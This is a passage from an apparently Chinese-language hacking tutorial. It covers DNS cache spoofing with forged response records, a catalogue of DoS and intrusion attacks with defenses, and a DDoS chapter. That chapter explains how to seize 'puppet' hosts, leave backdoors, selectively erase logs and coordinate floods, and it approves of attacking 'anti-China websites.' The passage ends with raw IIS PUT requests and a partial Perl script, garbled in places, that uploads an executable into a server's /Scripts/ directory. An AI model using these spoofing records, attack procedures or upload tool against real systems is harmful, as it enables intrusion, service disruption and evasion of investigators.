AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
当98.76.54.32的DNS服务器收到这个应答后,会把结果转发给123.45.67.98,就是那台有rlogin服务的unix主机(也是我们的目标 :) ),并且98.76.54.32这台DNS服务器会把这次的查询结果缓存起来.
这时unix主机就认为IP地址为38.222.74.2的主机名为trusted.host.com,然后unix主机查询本地的/etc/hosts.equiv文件,看这台主机是否被允许使用rlogin服务,很显然,我们的欺骗达到了.
在unix的环境中,有另外一种技术来防止这种欺骗的发生,就是查询PTR记录后,也查询PTR返回的主机名的A记录,然后比较两个IP地址是否相同:
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A
很不幸,在98.76.54.32的DNS服务器不会去查询这个记录,而会直接返回在查询2.74.222.38.in-addr.arpa时得到的并且存在缓存中的信息:
98.76.54.32 -> 123.45.67.89 [Query]
NQY: 1 NAN: 1 NNS: 2 NAD: 2
QY: trusted.host.com A
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
那么现在unix主机就认为38.222.74.2就是真正的trusted.host.com了,我们的目的达到了!
这种IP欺骗的条件是:你必须有一台Internet上的授权的DNS服务器,并且你能控制这台服务器,至少要能修改这台服务器的DNS记录,我们的欺骗才能进行.
2>.拒绝服务攻击 Denial of service
还是上面的例子,如果我们更改位于38.222.74.2的记录,然后对位于98.76.54.32的DNS服务器发出2.74.222.38.in-addr.arpa的查询,并使得查询结果如下:
因为74.222.38.in-addr.arpa完全由我们控制,所以我们能很方便的修改这些信息来实现我们的目的.
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
这样一来,使用98.76.54.32这台DNS服务器的用户就不能访问www.company.com了,因为这个IP根本就不存在!
3>.偷取服务 Theft of services
还是上面的例子,只是更改的查询结果如下:
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 3 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com CNAMEwww.competitor.com
AN: company.com MX 0 mail.competitor.com
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
这样一来,一个本想访问http://www.competitor.com的用户会被带到另外一个地方,甚至是敌对的公司的竹叶(想想把华为和北电联起来是什么样的感觉.:) ).并且发给company.com的邮件会被发送给mail.compertitor.com.(越来越觉得在网络上的日子不踏实! xxbin这样想).
4>.限制
对这些攻击,也有一定的限制.
首先,攻击者不能替换缓存中已经存在的记录.比如说,如果在98.76.54.32这个DNS服务器上已经有一条www.company.com的CNAME记录,那么攻击者试图替换为www.competitor.com将不会成功.然而,一些记录可以累加,比如A记录,如果在DNS的缓存中已经存在一条www.company.com的A记录为1.2.3.4,而攻击者却欺骗DNS服务器说www.company.com的A记录为4.3.2.1,那么www.company.com将会有两个A记录,客户端查询时会随机返回其中一个.(呵呵,这不是loading balance么?)
其次,DNS服务器有个缓存刷新时间问题,如果www.netbuddy.org的TTL为7200,那么DNS服务器仅仅会把www.netbuddy.org的信息缓存7200秒或者说两个小时.如果攻击者放入一条TLL为604800的A记录,那么这条记录将会在缓存中保存一周时间,过了默认的两天后,这个DNS服务器就会到处"分发"攻击者假造的记录.
下面是常用的几种可以累加和不能累加的记录:
A can add
NS can add
MX can add
PTR cannot add
CNAME cannot add
再说说网络攻击的几种形式吧,说这个不是叫大家去攻击别人而是作为一种了解而已
1、服务拒绝攻击
服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括:
死亡之ping (ping of death)
概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。
防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包括:从windows98之后的windows,NT(service
pack 3之后),linux、Solaris、和Mac OS都具有抵抗一般ping of
death攻击的能力。此外,对防火墙进行配置,阻断ICMP以及任何未知协议,都讲防止此类攻击。
泪滴(teardrop)
概览:泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括service
pack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。
防御:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。
UDP洪水(UDP flood)
概览:各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果足够多的数据流就会导致带宽的服务攻击。
防御:关掉不必要的TCP/IP服务,或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。
SYN洪水(SYN flood) 现在最流行的DDOS攻击的一种
概览:一些TCP/IP栈的实现只能等待从有限数量的计算机发来的ACK消息,因为他们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接停止响应,直到缓冲区里的连接企图超时。在一些创建连接不受限制的实现里,SYN洪水具有类似的影响。
防御:在防火墙上过滤来自同一主机的后续连接。
未来的SYN洪水令人担忧,由于释放洪水的并不寻求响应,所以无法从一个简单高容量的传输中鉴别出来。
Land攻击
概览:在Land攻击中,一个特别打造的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,对Land攻击反应不同,许多UNIX实现将崩溃,NT变的极其缓慢(大约持续五分钟)。
防御:打最新的补丁,或者在防火墙进行配置,将那些在外部接口上入站的含有内部源地址滤掉。(包括
10域、127域、192.168域、172.16到172.31域)
Smurf攻击
概览:一个简单的smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比ping
of death洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。
防御:为了防止黑客利用你的网络攻击他人,关闭外部路由器或防火墙的广播地址特性。为防止被攻击,在防火墙上设置规则,丢弃掉ICMP包。
Fraggle攻击
概览:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP
防御:在防火墙上过滤掉UDP应答消息
电子邮件炸弹
概览:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器不断的大量的向同一地址发送电子邮件,攻击者能够耗尽接受者网络的带宽。
防御:对邮件地址进行配置,自动删除来自同一主机的过量或重复的消息。
畸形消息攻击
概览:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息可能会崩溃。
防御:打最新的服务补丁。
2、利用型攻击
利用型攻击是一类试图直接对你的机器进行控制的攻击,最常见的有三种:
口令猜测
概览:一旦黑客识别了一台主机而且发现了基于NetBIOS、Telnet或NFS这样的服务的可利用的用户帐号,成功的口令猜测能提供对机器的控制。
防御:要选用难以猜测的口令,比如词和标点符号的组合。确保像NFS、NetBIOS和Telnet这样可利用的服务不暴露在公共范围。如果该服务支持锁定策略,就进行锁定。
特洛伊木马
概览:特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。最有效的一种叫做后门程序,恶意程序包括:NetBus、BackOrifice和BO2k,用于控制系统的良性程序如:netcat、VNC、pcAnywhere。理想的后门程序透明运行。
防御:避免下载可疑程序并拒绝执行,运用网络扫描软件定期监视内部主机上的监听TCP服务。
缓冲区溢出
概览:由于在很多的服务程序中大意的程序员使用象strcpy(),strcat()类似的不进行有效位检查的函数,最终可能导致恶意用户编写一小段利用程序来进一步打开安全豁口然后将该代码缀在缓冲区有效载荷末尾,这样当发生缓冲区溢出时,返回指针指向恶意代码,这样系统的控制权就会被夺取。
防御:利用SafeLib、tripwire这样的程序保护系统,或者浏览最新的安全公告不断更新操作系统。
3、信息收集型攻击
信息收集型攻击并不对目标本身造成危害,如名所示这类攻击被用来为进一步入侵提供有用的信息。主要包括:扫描技术、体系结构刺探、利用信息服务
扫描技术
地址扫描
概览:运用ping这样的程序探测目标地址,对此作出响应的表示其存在。
防御:在防火墙上过滤掉ICMP应答消息。
端口扫描
概览:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功的建立了连接的主机所开的端口。
防御:许多防火墙能检测到是否被扫描,并自动阻断扫描企图。
反响映射
概览:黑客向主机发送虚假消息,然后根据返回“host
unreachable”这一消息特征判断出哪些主机是存在的。目前由于正常的扫描活动容易被防火墙侦测到,黑客转而使用不会触发防火墙规则的常见消息类型,这些类型包括:RESET消息、SYN-ACK消息、DNS响应包。
防御:NAT和非路由代理服务器能够自动抵御此类攻击,也可以在防火墙上过滤“host unreachable”ICMP应答。
慢速扫描
概览:由于一般扫描侦测器的实现是通过监视某个时间桢里一台特定主机发起的连接的数目(例如每秒10次)来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。
防御:通过引诱服务来对慢速扫描进行侦测。
体系结构探测
概览:黑客使用具有已知响应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的响应进行检查。由于每种操作系统都有其独特的响应方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的响应与数据库中的已知响应进行对比,黑客经常能够确定出目标主机所运行的操作系统。
防御:去掉或修改各种Banner,包括操作系统和各种应用服务的,阻断用于识别的端口扰乱对方的攻击计划。
利用信息服务
DNS域转换
概览:DNS协议不对转换或信息性的更新进行身份认证,这使得该协议被人以一些不同的方式加以利用。如果你维护着一台公共的DNS服务器,黑客只需实施一次域转换操作就能得到你所有主机的名称以及内部IP地址。
防御:在防火墙处过滤掉域转换请求。
Finger服务
概览:黑客使用finger命令来刺探一台finger服务器以获取关于该系统的用户的信息。
防御:关闭finger服务并记录尝试连接该服务的对方IP地址,或者在防火墙上进行过滤。
LDAP服务
概览:黑客使用LDAP协议窥探网络内部的系统和它们的用户的信息。
防御:对于刺探内部网络的LDAP进行阻断并记录,如果在公共机器上提供LDAP服务,那么应把LDAP服务器放入DMZ。
4、假消息攻击
用于攻击目标配置不正确的消息,主要包括:DNS高速缓存污染、伪造电子邮件。
DNS高速缓存污染
概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以将不正确的信息掺进来并把用户引向黑客自己的主机。
防御:在防火墙上过滤入站的DNS更新,外部DNS服务器不应能更改你的内部服务器对内部机器的认识。
伪造电子邮件
概览:由于SMTP并不对邮件的发送者的身份进行鉴定,因此黑客可以对你的内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附带上可安装的特洛伊木马程序,或者是一个引向恶意网站的连接。
防御:使用PGP等安全工具并安装电子邮件证书。
此外有篇文章,在这值得所有人看看:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699
第26章
DDOS攻击
好了
今天我们来说说 DDOS 攻击 这里我不准备提供任何工具的下载地址 因为我反对不聊的攻击 如果你攻击反华网站还差不多
其实在前几天我总结过网络攻击的几种形式(详见:http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698) 也就几种:1。务拒绝攻击------死亡之ping (ping of death) 泪滴(teardrop) UDP洪水(UDP flood)
SYN洪水(SYN flood)--现在最流行的DDOS攻击的一种
Land攻击 Smurf攻击 Fraggle攻击 电子邮件炸弹 畸形消息攻击
2。利用型攻击
3。信息收集型攻击
4。假消息攻击
这里我就不详细说明了 大家可以参考上篇文章
当然DDOS是属于网络攻击里的 我是这么理解的 有的人把网络攻击和DDOS攻击连同是 不对的 虽然现在主要是才用DDOS 但也不能“抹杀”其他一些攻击方式的辉煌啊
要想理解DDoS的概念,我们就必须先介绍一下DoS(拒绝服务),DoS的英文全称是Denial of Service,也就是“拒绝服务”的意思。从网络攻击的各种方法和所产生的破坏情况来看,DoS算是一种很简单但又很有效的进攻方式。它的目的就是拒绝你的服务访问,破坏组织的正常运行,最终它会使你的部分Internet连接和网络系统失效。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务。DoS攻击的原理如图1所示。
从图1我们可以看出DoS攻击的基本过程:首先攻击者向服务器发送众多的带有虚假地址的请求,服务器发送回复信息后等待回传信息,由于地址是伪造的,所以服务器一直等不到回传的消息,分配给这次请求的资源就始终没有被释放。当服务器等待一定的时间后,连接会因超时而被切断,攻击者会再度传送新的一批请求,在这种反复发送伪地址请求的情况下,服务器资源最终会被耗尽。
DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了-目标对恶意攻击包的"消化能力"加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果。
这时侯分布式的拒绝服务攻击手段(DDoS)就应运而生了。你理解了DoS攻击的话,它的原理就很简单。如果说计算机与网络的处理能力加大了10倍,用一台攻击机来攻击不再能起作用的话,攻击者使用10台攻击机同时攻击呢?用100台呢?DDoS就是利用更多的傀儡机来发起进攻,以比从前更大的规模来进攻受害者。
高速广泛连接的网络给大家带来了方便,也为DDoS攻击创造了极为有利的条件。在低速网络时代时,黑客占领攻击用的傀儡机时,总是会优先考虑离目标网络距离近的机器,因为经过路由器的跳数少,效果好。而现在电信骨干节点之间的连接都是以G为级别的,大城市之间更可以达到2.5G的连接,这使得攻击可以从更远的地方或者其他城市发起,攻击者的傀儡机位置可以在分布在更大的范围,选择起来更灵活了。
被DDoS攻击时的现象
被攻击主机上有大量等待的TCP连接
网络中充斥着大量的无用的数据包,源地址为假
制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯
利用受害主机提供的服务或传输协议上的缺陷,反复高速的发出特定的服务请求,使受害主机无法及时处理所有正常请求
严重时会造成系统死机
攻击运行原理
如图,一个比较完善的DDoS攻击体系分成四大部分,先来看一下最重要的第2和第3部分:它们分别用做控制和实际发起攻击。请注意控制机与攻击机的区别,对第4部分的受害者来说,DDoS的实际攻击包是从第3部分攻击傀儡机上发出的,第2部分的控制机只发布命令而不参与实际的攻击。对第2和第3部分计算机,黑客有控制权或者是部分的控制权,并把相应的DDoS程序上传到这些平台上,这些程序与正常的程序一样运行并等待来自黑客的指令,通常它还会利用各种手段隐藏自己不被别人发现。在平时,这些傀儡机器并没有什么异常,只是一旦黑客连接到它们进行控制,并发出指令的时候,攻击傀儡机就成为害人者去发起攻击了。
有的朋友也许会问道:"为什么黑客不直接去控制攻击傀儡机,而要从控制傀儡机上转一下呢?"。这就是导致DDoS攻击难以追查的原因之一了。做为攻击者的角度来说,肯定不愿意被捉到,而攻击者使用的傀儡机越多,他实际上提供给受害者的分析依据就越多。在占领一台机器后,高水平的攻击者会首先做两件事:1.考虑如何留好后门(我以后还要回来的哦)!2.如何清理日志。这就是擦掉脚印,不让自己做的事被别人查觉到。比较不敬业的黑客会不管三七二十一把日志全都删掉,但这样的话网管员发现日志都没了就会知道有人干了坏事了,顶多无法再从日志发现是谁干的而已。相反,真正的好手会挑有关自己的日志项目删掉,让人看不到异常的情况。这样可以长时间地利用傀儡机。
但是在第3部分攻击傀儡机上清理日志实在是一项庞大的工程,即使在有很好的日志清理工具的帮助下,黑客也是对这个任务很头痛的。这就导致了有些攻击机弄得不是很干净,通过它上面的线索找到了控制它的上一级计算机,这上级的计算机如果是黑客自己的机器,那么他就会被揪出来了。但如果这是控制用的傀儡机的话,黑客自身还是安全的。控制傀儡机的数目相对很少,一般一台就可以控制几十台攻击机,清理一台计算机的日志对黑客来讲就轻松多了,这样从控制机再找到黑客的可能性也大大降低。
如何组织一次DDoS攻击的?
这里用"组织"这个词,是因为DDoS并不象入侵一台主机那样简单。一般来说,黑客进行DDoS攻击时会经过这样的步骤:
1.搜集了解目标的情况
下列情况是黑客非常关心的情报:
被攻击目标主机数目、地址情况
目标主机的配置、性能
目标的带宽
对于DDoS攻击者来说,攻击互联网上的某个站点,如http://www.WWWW.com,有一个重点就是确定到底有多少台主机在支持这个站点,一个大的网站可能有很多台主机利用负载均衡技术提供同一个网站的www服务。以yahoo为例,一般会有下列地址都是提供http://www.WWW.com服务的:
66.218.71.87
66.218.71.88
66.218.71.89
66.218.71.80
66.218.71.81
66.218.71.83
66.218.71.84
66.218.71.86
如果要进行DDoS攻击的话,应该攻击哪一个地址呢?使66.218.71.87这台机器瘫掉,但其他的主机还是能向外提供www服务,所以想让别人访问不到http://www.WWW.com的话,要所有这些IP地址的机器都瘫掉才行。在实际的应用中,一个IP地址往往还代表着数台机器:网站维护者使用了四层或七层交换机来做负载均衡,把对一个IP地址的访问以特定的算法分配到下属的每个主机上去。这时对于DDoS攻击者来说情况就更复杂了,他面对的任务可能是让几十台主机的服务都不正常。
所以说事先搜集情报对DDoS攻击者来说是非常重要的,这关系到使用多少台傀儡机才能达到效果的问题。简单地考虑一下,在相同的条件下,攻击同一站点的2台主机需要2台傀儡机的话,攻击5台主机可能就需要5台以上的傀儡机。有人说做攻击的傀儡机越多越好,不管你有多少台主机我都用尽量多的傀儡机来攻就是了,反正傀儡机超过了时候效果更好。
但在实际过程中,有很多黑客并不进行情报的搜集而直接进行DDoS的攻击,这时候攻击的盲目性就很大了,效果如何也要*运气。其实做黑客也象网管员一样,是不能偷懒的。一件事做得好与坏,态度最重要,水平还在其次。
2.占领傀儡机
黑客最感兴趣的是有下列情况的主机:
链路状态好的主机
性能好的主机
安全管理水平差的主机
这一部分实际上是使用了另一大类的攻击手段:利用形攻击。这是和DDoS并列的攻击方式。简单地说,就是占领和控制被攻击的主机。取得最高的管理权限,或者至少得到一个有权限完成DDoS攻击任务的帐号。对于一个DDoS攻击者来说,准备好一定数量的傀儡机是一个必要的条件,下面说一下他是如何攻击并占领它们的。
首先,黑客做的工作一般是扫描,随机地或者是有针对性地利用扫描器去发现互联网上那些有漏洞的机器,象程序的溢出漏洞、cgi、Unicode、ftp、数据库漏洞…(简直举不胜举啊),都是黑客希望看到的扫描结果。随后就是尝试入侵了,具体的手段就不在这里多说了,感兴趣的话网上有很多关于这些内容的文章。
总之黑客现在占领了一台傀儡机了!然后他做什么呢?除了上面说过留后门擦脚印这些基本工作之外,他会把DDoS攻击用的程序上载过去,一般是利用ftp。在攻击机上,会有一个DDoS的发包程序,黑客就是利用它来向受害目标发送恶意攻击包的。
3.实际攻击
经过前2个阶段的精心准备之后,黑客就开始瞄准目标准备发射了。前面的准备做得好的话,实际攻击过程反而是比较简单的。就象图示里的那样,黑客登录到做为控制台的傀儡机,向所有的攻击机发出命令:"预备~ ,瞄准~,开火!"。这时候埋伏在攻击机中的DDoS攻击程序就会响应控制台的命令,一起向受害主机以高速度发送大量的数据包,导致它死机或是无法响应正常的请求。黑客一般会以远远超出受害方处理能力的速度进行攻击,他们不会"怜香惜玉"。
老到的攻击者一边攻击,还会用各种手段来监视攻击的效果,在需要的时候进行一些调整。简单些就是开个窗口不断地ping目标主机,在能接到回应的时候就再加大一些流量或是再命令更多的傀儡机来加入攻击。
下面我们再详细说说SYN Flood攻击
SYN-Flood是目前最流行的DDoS攻击手段,早先的DoS的手段在向分布式这一阶段发展的时候也经历了浪里淘沙的过程。SYN-Flood的攻击效果最好,应该是众黑客不约而同选择它的原因吧。那么我们一起来看看SYN-Flood的详细情况。
Syn Flood原理 - 三次握手
Syn Flood利用了TCP/IP协议的固有漏洞。面向连接的TCP三次握手是Syn Flood存在的基础。
TCP连接的三次握手
如图,在第一步中,客户端向服务端提出连接请求。这时TCP SYN标志置位。客户端告诉服务端序列号区域合法,需要检查。客户端在TCP报头的序列号区中插入自己的ISN。服务端收到该TCP分段后,在第二步以自己的ISN回应(SYN标志置位),同时确认收到客户端的第一个TCP分段(ACK标志置位)。在第三步中,客户端确认收到服务端的ISN(ACK标志置位)。到此为止建立完整的TCP连接,开始全双工模式的数据传输过程。
Syn Flood攻击者不会完成三次握手
假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)。
下面我们来分析一下这些经典的黑客程序。
1、Trinoo
Trinoo的攻击方法是向被攻击目标主机的随机端口发出全零的4字节UDP包,在处理这些超出其处理能力的垃圾数据包的过程中,被攻击主机的网络性能不断下降,直到不能提供正常服务,乃至崩溃。它对IP地址不做假,采用的通讯端口是:
攻击者主机到主控端主机:27665/TCP
主控端主机到代理端主机:27444/UDP
代理端主机到主服务器主机:31335/UDP
2、TFN
TFN由主控端程序和代理端程序两部分组成,它主要采取的攻击方法为:SYN风暴、Ping风暴、UDP炸弹和SMURF,具有伪造数据包的能力。
3、TFN2K
TFN2K是由TFN发展而来的,在TFN所具有的特性上,TFN2K又新增一些特性,它的主控端和代理端的网络通讯是经过加密的,中间还可能混杂了许多虚假数据包,而TFN对ICMP的通讯没有加密。攻击方法增加了Mix和Targa3。并且TFN2K可配置的代理端进程端口。
4、Stacheldraht
Stacheldraht也是从TFN派生出来的,因此它具有TFN的特性。此外它增加了主控端与代理端的加密通讯能力,它对命令源作假,可以防范一些路由器的RFC2267过滤。Stacheldrah中有一个内嵌的代理升级模块,可以自动下载并安装最新的代理程序。
DDoS的监测
检测DDoS攻击的主要方法有以下几种:
1、根据异常情况分析
当网络的通讯量突然急剧增长,超过平常的极限值时,你可一定要提高警惕,检测此时的通讯;当网站的某一特定服务总是失败时,你也要多加注意;当发现有特大型的ICP和UDP数据包通过或数据包内容可疑时都要留神。总之,当你的机器出现异常情况时,你最好分析这些情况,防患于未然。
2、使用DDoS检测工具
当攻击者想使其攻击阴谋得逞时,他首先要扫描系统漏洞,目前市面上的一些网络入侵检测系统,可以杜绝攻击者的扫描行为。另外,一些扫描器工具可以发现攻击者植入系统的代理程序,并可以把它从系统中删除。
DDoS的防范
到目前为止,进行DDoS攻击的防御还是比较困难的。首先,这种攻击的特点是它利用了TCP/IP协议的漏洞,除非你不用TCP/IP,才有可能完全抵御住DDoS攻击。一位资深的安全专家给了个形象的比喻:DDoS就好象有1,000个人同时给你家里打电话,这时候你的朋友还打得进来吗?
不过即使它难于防范,也不是说我们就应该逆来顺受,实际上防止DDoS并不是绝对不可行的事情。互联网的使用者是各种各样的,与DDoS做斗争,不同的角色有不同的任务。我们以下面几种角色为例:
企业网管理员
ISP、ICP管理员
骨干网络运营商
企业网管理员
网管员做为一个企业内部网的管理者,往往也是安全员、守护神。在他维护的网络中有一些服务器需要向外提供WWW服务,因而不可避免地成为DDoS的攻击目标,他该如何做呢?可以从主机与网络设备两个角度去考虑。
主机上的设置
几乎所有的主机平台都有抵御DoS的设置,总结一下,基本的有几种:
关闭不必要的服务
限制同时打开的Syn半连接数目
缩短Syn半连接的time out 时间
及时更新系统补丁
网络设备上的设置
企业网的网络设备可以从防火墙与路由器上考虑。这两个设备是到外界的接口设备,在进行防DDoS设置的同时,要注意一下这是以多大的效率牺牲为代价的,对你来说是否值得。
1.防火墙
禁止对主机的非开放服务的访问
限制同时打开的SYN最大连接数
限制特定IP地址的访问
启用防火墙的防DDoS的属性
严格限制对外开放的服务器的向外访问
第五项主要是防止自己的服务器被当做工具去害人。
2.路由器
以Cisco路由器为例
Cisco Express Forwarding(CEF)
使用 unicast reverse-path
访问控制列表(ACL)过滤
设置SYN数据包流量速率
升级版本过低的ISO
为路由器建立log server
其中使用CEF和Unicast设置时要特别注意,使用不当会造成路由器工作效率严重下降,升级IOS也应谨慎。路由器是网络的核心设备,与大家分享一下进行设置修改时的小经验,就是先不保存。Cisco路由器有两份配置startup config和running config,修改的时候改变的是running config,可以让这个配置先跑一段时间(三五天的就随意啦),觉得可行后再保存配置到startup config;而如果不满意想恢复原来的配置,用copy start run就行了。
ISP / ICP管理员
ISP / ICP为很多中小型企业提供了各种规模的主机托管业务,所以在防DDoS时,除了与企业网管理员一样的手段外,还要特别注意自己管理范围内的客户托管主机不要成为傀儡机。客观上说,这些托管主机的安全性普遍是很差的,有的连基本的补丁都没有打就赤膊上阵了,成为黑客最喜欢的"肉鸡",因为不管这台机器黑客怎么用都不会有被发现的危险,它的安全管理太差了;还不必说托管的主机都是高性能、高带宽的-简直就是为DDoS定制的。而做为ISP的管理员,对托管主机是没有直接管理的权力的,只能通知让客户来处理。在实际情况时,有很多客户与自己的托管主机服务商配合得不是很好,造成ISP管理员明知自己负责的一台托管主机成为了傀儡机,却没有什么办法的局面。而托管业务又是买方市场,ISP还不敢得罪客户,怎么办?咱们管理员和客户搞好关系吧,没办法,谁让人家是上帝呢?呵呵,客户多配合一些,ISP的主机更安全一些,被别人告状的可能性也小一些。
骨干网络运营商
这个我们就不说了
因为我们都不是骨干运营商
第27章
深入对iis写权限的利用
这篇分析文章是一个朋友转给我看的,我觉得真的不错,所以就只是做点术语的修改,请大家了解
原文
大家可能看过《远程分析IIS设置》,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用《远程分析IIS设置》文章对iis写权限分析内容:
写权限
测试一个目录对于web用户是否具有写权限,采用如下方法:telnet到服务器的web端口(80)并发送一个如下请求:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
这时服务器会返回一个100( 继续)的信息:
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
接着,我们输入10个字母:
AAAAAAAAAA
送出这个请求后,看服务器的返回信息,如果是一个 201 Created响应:
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
那么就说明这个目录的写权限是开着的,反之,如果返回的是一个403错误,那么写权限就是没有开起来,如果需要你认证,并且返回一个 401(权限禁止) 的响应的话,说明是开了写权限,但是匿名用户不允许。如果一个目录同时开了”写”和“脚本和可执行程序”的话,那么web用户就可以上传一个程序并且执行它,恐怖哦%^#$!~
这里简单说明下:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
PUT:请求服务器将附件的实体储存在提供的请求URL处,如果该请求URL指向的资源已经存在,则附件实体应被看做是当前原始服务器上资源的修改版本。如果请求URL没有指向现存的资源,该URL将被该请求的用户代理定义成为一个新的资源,原始服务器将用该URL产生这个资源。
Host:是HTTP请求的发送地址
Content-Length:是内容长度,也就是实体长度,该长度值和上传的文件大小一致
用nc(telnet)提交很烦琐,我们这里写个简单的perl程序,来完成这个复杂的提交过程,在写代码时我们用binmode()方式打开文件,代码如下:
#!/usr/bin/perl
use I:Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; #得到文件大小
print "$file size is $size bytes\n";
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n"; #sock连接
open(FILE,"$file");
